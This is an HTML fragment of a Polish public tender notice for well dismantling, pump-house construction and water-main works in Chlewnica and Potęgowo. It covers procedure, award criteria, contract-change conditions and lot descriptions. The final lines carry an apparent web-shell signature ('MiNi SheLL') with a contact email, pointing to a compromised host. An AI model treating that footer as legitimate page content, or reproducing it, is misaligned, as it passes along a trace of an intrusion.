                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />
1) Doświadczenie zawodowe (załącznik nr 3)  wykaz robot budowlanych zgodnie z pkt 7.1. 3)a SIWZ z załączeniem dowodów potwierdzających, że roboty te zostały wykonane należycie, w szczególności, czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, a jeżeli okres prowadzenia działalności jest krótszy  w okresie prowadzenia działalności. Wykonawcy składający ofertę wspólną przedkładają jeden wspólny wykaz;
2) Potencjał kadrowy (załącznik nr 4)  wykaz osób, którymi dysponuje Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia zgodnie z pkt 7.1.3)b SIWZ wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia i do potwierdzenia warunku zgodnie z pkt 7.1.3)b, a także zakresu wykonywanych przez nie czynności oraz informacją o prawie do dysponowania wskazanymi osobami. Wykonawcy składający ofertę wspólną przedkładają jeden wspólny wykaz;
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje możliwość zmian w postanowieniach umowy w następujących sytuacjach:
1) wady dokumentacji projektowej;	
2) zmian w dokumentacji projektowej;
3) rezygnacji z wykonania części prac;
4) złych warunków atmosferycznych, tj.:
- ciągłe i intensywne opady deszczu przez okres min. 5 dni;
- kilkudniowe silne wiatry o prędkości pow.70 km/h;
5) zmiany w obowiązujących przepisach;
6) zmiany na stanowisku kierownika budowy lub robót (pod warunkiem spełniania przez nowego kierownika minimalnych warunków określonych w SIWZ);;
7) zmian mających na celu poprawienie wartości przedmiotu zamówienia, sprawności lub wydajności materiałów i urządzeń;
8) Zmiany w trakcie realizacji inwestycji dotyczące zmiany parametrów technicznych realizowanego przedmiotu umowy  mogą zaistnieć w przypadku:
a) poprawy parametrów technicznych, jakości, sprawności, wydajności lub innych parametrów charakterystycznych dla danego elementu robót,
b) aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany obowiązujących przepisów,
c) pojawienia się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
d) zmiany przepisów prawa powszechnie obowiązującego, jeśli wpływa ona na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy.
9) innej sytuacji niezależnej od Wykonawcy, tj.:
- wstrzymanie robót przez inne instytucje;
- nieprzewidziane awarie urządzeń administrowanych przez innych operatorów sieci niezinwentaryzowanych;
Zmiany umowy mogą dotyczyć:
- osób wyznaczonych do realizacji zamówienia;
- terminu wykonania zamówienia;
- wynagrodzenia;
- terminu zapłaty.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Likwidacja obudowy podziemnej i urządzeń studni Nr 1 oraz montaż obudowy naziemnej i urządzeń do poboru wody otworu stdni Nr 2 i 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część I: 

- Lokalizacja: miejscowość Chlewnica, działka nr 24/1 obręb Chlewnica, gmina  Potęgowo, powiat słupski.

 Przedmiotem zamówienia jest:
1. Likwidacja obudowy podziemnej i urządzeń studni Nr 1: 
Studnia nr 1 znajduje się na działce n 24/1 obręb Chlewnica. Studnia odwiercona prawdopodobnie w latach 60-tych, brak danych wykonawcy otworu, jego głębokości, wydajności oraz konstrukcji. Informacje dotyczące otworu są oparte na rozpoznaniu hydrogeologicznym. Zakłada się, że otwór został wykonany do głębokości ok. 50 m, kolumna filtrowa posadowiona została na głębokości ok. 50,0 m. Do likwidacji otworu nr 1 należy przystąpić po wykonaniu obudowy i montażu urządzeń studni nr 2 i 3. Przestrzeń po obudowie studni zasypać gliniastym urobkiem. Na powierzchni wykonać betonową płytę informacyjną. Prace powyższe będą prowadzone w oparciu o operat wodnoprawny i decyzję pozwolenia na likwidację urządzeń wodnych. Po zakończeniu robót związanych z likwidacją otworu nr 1 zostanie sporządzona dokumentacja geologiczna zgodnie z Rozporządzeniem Ministra Środowiska z dnia 15 grudnia 2011 r. w sprawie szczegółowych wymagań dotyczących innych dokumentacji geologicznych (Dz.U. nr 282 poz. 1656)
2.Montaż obudowy naziemnej i urządzeń do poboru wody otworu studni Nr 2 i 3:
Zakres prac obejmuje przygotowanie do eksploatacji wykonanych w I ETAPIE inwestycji otworów o głębokości ok 90 m. Wykonane otwory studzienne nr 2 (podstawowy) i nr 3(awaryjny) zostaną wyposażone w obudowy naziemne i urządzenia do poboru wody wraz z instalacją pomp głębinowych, dobranych odpowiednio do wymagań inwestora. Obudowa  składa się z podstawy betonowej zbrojonej oraz z pokrywy wykonanej z laminatu poliestrowo  szklanego w całości wypełnionej pianką poliuretanową stanowiącą ocieplenie. Obudowa  wyposażona w mechanizm zamykający, kominek wentylacyjny oraz ogrzewanie elektryczne. Pompę głębinową należy dobrać w taki sposób aby uzyskać wydajność otworu Q = 75,0 m 3 /h  oraz wysokość podnoszenia ok. 100 m. Głębokość zawieszenia pompy określa się na 40 m p.p.t.. Po zakończeniu prac należy zamontować w otworze czujnik, który pozwoli ochronić pompy przed suchobiegiem. Do studni nr 2 i 3 należy doprowadzić zasilanie energetyczne.     

- Wykonawca zobowiązany jest do zawarcia umów z gestorami sieci (woda , energia) przed rozpoczęciem robót.
- Obsługa geodezyjna i inwentaryzacja powykonawcza należy do obowiązków Wykonawcy robót.
- Prace i roboty związane z wykonaniem w/w robót należy skoordynować z realizacją jednocześnie wykonywanych robót budowy budynku hydroforni i sieci wodociągowej. 
- UWAGA: Przedmiotem zamówienia jest II ETAP z załączonej dokumentacji tj. części opracowań dotyczące: Likwidacji obudowy i urządzeń studni Nr 1 oraz montażu obudowy i urządzeń otworów Nr 2 i 3.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45255110-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Budowa sieci wodociągowej i budynku hydroforni w Chlewnicy oraz budowa sieci wodociągowej dla terenu inwestycyjego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II: 

Zadanie Nr 1: Budowa hydroforni i sieci wodociągowej w Chlewnicy:

- Lokalizacja: miejscowość Chlewnica działki nr 24/1; 25/1; 26/1; 28/1 obręb Chlewnica i działka nr 767 obręb Potęgowo, gmina Potęgowo, powiat słupski.

1) Budowa sieci wodociągowej  o całkowitej długości L = 668,20 mb, 
wykonana: z rur polietylenowych (PE, PEHD) 100 o ciśnieniu nominalnym PN 10 bar (1,0 MPa) SDR17, wraz z niezbędnymi kształtkami i łącznikami. 
Wcinka do istniejącej sieci wraz z przyłączem z rury PE 40 o długości L=50,00 mb.
Przejście rurociągu pod drogą krajowa nr 6 z rur PE 100 RC PN 16 SDR 11 fi 225,  w rurze ochronnej  stalowej, wykonanej metoda przewiertu, prostopadle do osi drogi. Przewiert w miejscowości Chlewnica w km: 241 + 910 na terenie działki drogowej nr 28/1 obręb Chlewnica. Projektowany przewiert należy wykonać zgodnie z warunkami określonymi w decyzji GDDKiA Oddział w Gdańsku z dnia 09.12.2016. 
2)Wyposażenie budynku hydroforni:
  3 hydrofory o wym. 150x300 cm i pojemności 5.000 litrów każdy.  Zainstalowane zbiorniki będą pracować w zakresie ciśnień p min=0,3 MPa i p max=0,45MPa. 
- sprężarka tłokowa o mocy 2x3 kW, ciśnieniu nom. 8 bar i wydajności 670l/min ze zbiornikiem 400 l.
- chlorator o parametrach: wydajność max = 0,19l/min; max ciśnienie  0,6 MPa; moc silnika 0,25 kW
- rurociągi technologiczne fi 150   200 mm,
- zlew ze stali nierdzewnej,
- instalacje wodociągowe wewnętrzne i zewnętrzne
- instalacje elektryczne wewnętrzne i zewnętrzne z istniejącego przyłącza, zasilającego obecną hydrofornię.
3) Budynek hydroforni
Wyburzenie istniejącego budynku hydroforni, rozbiórka ogrodzenia w obrębie istniejącego budynku hydroforni. Budowa nowego budynku parterowego, w rzucie prostokąta, o powierzchni 66m2.
Budynek posadowiony na ławach fundamentowych żelbetowych z betonu B25, wewnątrz budynku znajdują się pyty fundamentowe  fundamenty pod maszyny. Fundamenty izolowane, ściany fundamentowe murowane z bloczków betonowych, zaizolowane, ocieplone z wyprawą tynkiem mozaikowym. Budynek wykonany w technologii murowanej, z bloczków gazobetonowych gr. 24cm, ocieplony z zewnątrz styropianem gr. 20cm, z wyprawą tynkarską w technologii lekkiej-mokrej. Strop drewniany izolowany i ocieplony wełną mineralną gr. 25cm. Wewnątrz tynki zwykłe cem-wap, malowane na biało. Sufit w formie obudowy z płyt gips-karton mocowanych do konstrukcji stropu, malowany na biało.  Stolarka okienna oraz parapety  PCV. Drzwi wejściowe stalowe. Dach w konstrukcji drewnianej , z pokryciem z blacho dachówki. Obróbki blacharskie, parapety, orynnowanie  z blachy stalowej powlekanej. Wokół budynku opaska z płytek betonowych 50x50x7. W planie zagospodarowania ogrodzenie z siatki metalowej, brama wjazdowa i furtka  oraz nawierzchnia utwardzona z kamienia łamanego, na podbudowie z piasku.
- Wszystkie prace należy wykonać zgodnie z załączoną dokumentacją.  


Zadanie Nr 2: Wielofunkcyjny ośrodek przemysłowo  usługowy w Potęgowie  (Budowa sieci wodociągowej ETAP I):  

- Lokalizacja: miejscowość Potęgowo działki nr 767; 768; 758; 718; 719 obręb Potęgowo, gmina Potęgowo, powiat słupski.

Budowa sieci wodociągowej I Etap w ramach zadania inwestycyjnego  pn.: Budowa uzbrojenia terenu dla Wielofunkcyjnego Ośrodka Przemysłowo  Usługowego w Potęgowie: sieci i przyłącza wodociągowe (część). 
Zakres zadania obejmuje budowę sieci wodociągowej  odcinek W-62-W-75 i W62-W62.7.  Zewnętrzna sieć wodociągowa o całkowitej długości L = 332,50 mb, wykonana: z rur polietylenowych (PE, PEHD) o ciśnieniu nominalnym PN 10 bar (1,0 MPa) SDR17, wraz z niezbędnymi kształtkami i łącznikami. 
- Rury o średnicy zewnętrznej:
125 mm  83,0 mb;
110 mm  233,0 mb;
90 mm  16,50 mb.
- Sieć wodociągowa  uzbrojona w zasuwy klinowe DN 80, hydranty nadziemne DN80  - 4 kpl.
- Przejścia rurociągów pod drogami w rurach ochronnych stalowych lub z tworzywa sztucznego.  
- UWAGA: przedmiotem zamówienia jest I ETAP z załączonej dokumentacji tj. części opracowań zgodnie z załączoną dokumentacją i przedmiarem robót. 
- Wszystkie prace należy wykonać zgodnie z załączoną dokumentacją (w części która dotyczy)
- Do zadań Wykonawcy robót należy: obsługa geodezyjna i inwentaryzacja powykonawcza, uzgodnienie i opłata za zajęcia pasa drogowego, uzgodnienie z ZE zwiększenia mocy energii elektrycznej w hydroforni wg potrzeb, uzgodnienie wejścia na teren właścicieli nieruchomości.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45232150-8, 45200000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com